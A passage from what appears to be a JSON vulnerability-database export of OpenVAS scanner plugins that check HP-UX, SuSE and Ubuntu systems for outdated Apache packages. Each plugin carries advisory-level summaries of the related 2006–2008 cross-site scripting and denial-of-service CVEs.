ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:20:47", "references": ["2008-021"], "pluginID": "850009", "description": "Check for the Version of apache2,apache", "edition": 3, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-01-23T00:00:00", "title": "SuSE Update for apache2,apache SUSE-SA:2008:021", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2007-6203", "CVE-2008-0005", "CVE-2007-6421", "CVE-2007-6388", "CVE-2007-5000", "CVE-2007-6422"], "modified": "2017-12-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850009", "id": "OPENVAS:850009", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2008_021.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for apache2,apache SUSE-SA:2008:021\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Various minor bugs have been fixed in the Apache 1 and\n Apache 2 web servers and released as a roll-up update.\n\n Security problems that were fixed include:\n\n - cross site scripting problem when processing the 'Expect' header\n CVE-2006-3918 (Apache 1 only)\n\n - cross site scripting problem in mod_imap CVE-2007-5000\n (Apache 1 and 2)\n\n - cross site scripting problem in mod_status CVE-2007-6388\n (Apache 1 and 2)\n\n - cross site scripting problem in the ftp proxy module CVE-2008-0005\n (Apache 1 and 2)\n\n - cross site scripting problem in the error page for status code 413\n CVE-2007-6203 (Apache 2)\n\n - cross site scripting problem in mod_proxy_balancer\n CVE-2007-6421 (Apache 2)\n\n - A flaw in mod_proxy_balancer allowed attackers to crash apache\n CVE-2007-6422 (Apache 2)\";\n\ntag_impact = \"cross site scripting\";\ntag_affected = \"apache2,apache on SUSE LINUX 10.1, openSUSE 10.2, openSUSE 10.3, SUSE SLES 9, Novell Linux Desktop 9 SDK, Novell Linux Desktop 9, Open Enterprise Server, Novell Linux POS 9, SLE SDK 10 SP1, SUSE Linux Enterprise Server 10 SP1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850009);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-23 16:44:26 +0100 (Fri, 23 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"SUSE-SA\", value: \"2008-021\");\n script_cve_id(\"CVE-2006-3918\", \"CVE-2007-5000\", \"CVE-2007-6203\", \"CVE-2007-6388\", \"CVE-2007-6421\", \"CVE-2007-6422\", \"CVE-2008-0005\");\n script_name( \"SuSE Update for apache2,apache SUSE-SA:2008:021\");\n\n script_summary(\"Check for the Version of apache2,apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE10.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.2.4~70.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.2.4~70.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.2.4~70.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.2.4~70.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.2.4~70.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-utils\", rpm:\"apache2-utils~2.2.4~70.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.2.4~70.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE10.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.2.3~24\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.2.3~24\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.2.3~24\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.2.3~24\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.2.3~24\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.2.3~24\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLDk9\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr0\", rpm:\"libapr0~2.0.59~1.8\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.0.59~1.8\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.0.59~1.8\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.0.59~1.8\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.59~1.8\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.0.59~1.8\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.0.59~1.8\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"OES\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~1.3.29~71.26\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~1.3.29~71.26\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-doc\", rpm:\"apache-doc~1.3.29~71.26\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-example-pages\", rpm:\"apache-example-pages~1.3.29~71.26\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.8.16~71.26\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr0\", rpm:\"libapr0~2.0.59~1.8\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.0.59~1.8\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.0.59~1.8\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.0.59~1.8\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.59~1.8\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.0.59~1.8\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.0.59~1.8\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES9\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~1.3.29~71.26\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~1.3.29~71.26\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-doc\", rpm:\"apache-doc~1.3.29~71.26\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-example-pages\", rpm:\"apache-example-pages~1.3.29~71.26\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.8.16~71.26\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr0\", rpm:\"libapr0~2.0.59~1.8\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.0.59~1.8\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.0.59~1.8\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.0.59~1.8\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.59~1.8\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.0.59~1.8\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.0.59~1.8\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLDk9SDK\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~1.3.29~71.26\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~1.3.29~71.26\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-doc\", rpm:\"apache-doc~1.3.29~71.26\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-example-pages\", rpm:\"apache-example-pages~1.3.29~71.26\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.8.16~71.26\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr0\", rpm:\"libapr0~2.0.59~1.8\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.0.59~1.8\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.0.59~1.8\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.0.59~1.8\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.59~1.8\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.0.59~1.8\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.0.59~1.8\", rls:\"NLDk9SDK\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"LES10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.2.3~16.17.3\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.2.3~16.17.3\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.2.3~16.17.3\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.2.3~16.17.3\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.2.3~16.17.3\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.2.3~16.17.3\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESDK10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.2.3~16.17.3\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.2.3~16.17.3\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.2.3~16.17.3\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.2.3~16.17.3\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.2.3~16.17.3\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.2.3~16.17.3\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.2.3~16.17.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.2.3~16.17.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.2.3~16.17.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.2.3~16.17.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.2.3~16.17.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.2.3~16.17.3\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLPOS9\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~1.3.29~71.26\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~1.3.29~71.26\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-doc\", rpm:\"apache-doc~1.3.29~71.26\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-example-pages\", rpm:\"apache-example-pages~1.3.29~71.26\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.8.16~71.26\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr0\", rpm:\"libapr0~2.0.59~1.8\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.0.59~1.8\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.0.59~1.8\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.0.59~1.8\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.59~1.8\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.0.59~1.8\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.0.59~1.8\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-12-04T11:29:39", "references": ["http://www.ubuntu.com/usn/usn-575-1/", "575-1"], "pluginID": "840304", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-575-1", "edition": 3, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-03-23T00:00:00", "title": "Ubuntu Update for apache2 vulnerabilities USN-575-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2007-4465", "CVE-2008-0005", "CVE-2007-6421", "CVE-2007-3847", "CVE-2007-6388", "CVE-2007-5000", "CVE-2007-6422"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840304", "id": "OPENVAS:840304", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_575_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for apache2 vulnerabilities USN-575-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that Apache did not sanitize the Expect header from\n an HTTP request when it is reflected back in an error message, which\n could result in browsers becoming vulnerable to cross-site scripting\n attacks when processing the output. With cross-site scripting\n vulnerabilities, if a user were tricked into viewing server output\n during a crafted server request, a remote attacker could exploit this\n to modify the contents, or steal confidential data (such as passwords),\n within the same domain. This was only vulnerable in Ubuntu 6.06.\n (CVE-2006-3918)\n\n It was discovered that when configured as a proxy server and using a\n threaded MPM, Apache did not properly sanitize its input. A remote\n attacker could send Apache crafted date headers and cause a denial of\n service via application crash. By default, mod_proxy is disabled in\n Ubuntu. (CVE-2007-3847)\n \n It was discovered that mod_autoindex did not force a character set,\n which could result in browsers becoming vulnerable to cross-site\n scripting attacks when processing the output. (CVE-2007-4465)\n \n It was discovered that mod_imap/mod_imagemap did not force a\n character set, which could result in browsers becoming vulnerable\n to cross-site scripting attacks when processing the output. By\n default, mod_imap/mod_imagemap is disabled in Ubuntu. (CVE-2007-5000)\n \n It was discovered that mod_status when status pages were available,\n allowed for cross-site scripting attacks. By default, mod_status is\n disabled in Ubuntu. (CVE-2007-6388)\n \n It was discovered that mod_proxy_balancer did not sanitize its input,\n which could result in browsers becoming vulnerable to cross-site\n scripting attacks when processing the output. By default,\n mod_proxy_balancer is disabled in Ubuntu. This was only vulnerable\n in Ubuntu 7.04 and 7.10. (CVE-2007-6421)\n \n It was discovered that mod_proxy_balancer could be made to\n dereference a NULL pointer. A remote attacker could send a crafted\n request and cause a denial of service via application crash. By\n default, mod_proxy_balancer is disabled in Ubuntu. This was only\n vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-6422)\n \n It was discovered that mod_proxy_ftp did not force a character set,\n which could result in browsers becoming vulnerable to cross-site\n scripting attacks when processing the output. By default,\n mod_proxy_ftp is disabled in Ubuntu. (CVE-2008-0005)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-575-1\";\ntag_affected = \"apache2 vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 6.10 ,\n Ubuntu 7.04 ,\n Ubuntu 7.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-575-1/\");\n script_id(840304);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"575-1\");\n script_cve_id(\"CVE-2006-3918\", \"CVE-2007-3847\", \"CVE-2007-4465\", \"CVE-2007-5000\", \"CVE-2007-6388\", \"CVE-2007-6421\", \"CVE-2007-6422\", \"CVE-2008-0005\");\n script_name( \"Ubuntu Update for apache2 vulnerabilities USN-575-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.3-3.2ubuntu2.1\", rls:\"UBUNTU7.04\")) != 